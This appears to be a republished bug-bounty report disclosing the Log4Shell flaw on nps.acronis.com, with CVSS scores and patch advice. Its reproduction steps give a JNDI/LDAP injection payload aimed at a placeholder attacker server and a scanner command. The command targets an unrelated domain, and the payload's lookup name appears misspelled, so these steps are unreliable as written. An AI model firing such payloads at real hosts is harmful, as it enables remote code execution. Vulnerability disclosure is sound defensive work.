Acronis: [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day

2021-12-1323:42:16

rhinestonecowboy

hackerone.com

$1000

114

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON

Summary

The website at nps.acronis.com is vulnerable to CVE-2021-44228

Steps To Reproduce

I used this script to find this. It spins up an interact-sh server to receive the callback and send the payload in the query string and about 30 diffent headers. You can reproduce manually with curl and interact-sh/burp collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them.

Construct the payload: ${jdni:ldap://nps.acronis.com.<your-server>/test}
Inject the payload in the Request Headers (User Agent, X-Forwarded-For etc) or use the script from fullscan: python3 log4j-scan.py -u 'https://marketingportal.engelvoelkers.com'
Observe the callback, proving the deserialization of untrusted data which leads to rce

{F1544482}

Recommendations

Update log4j to the latest version
If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.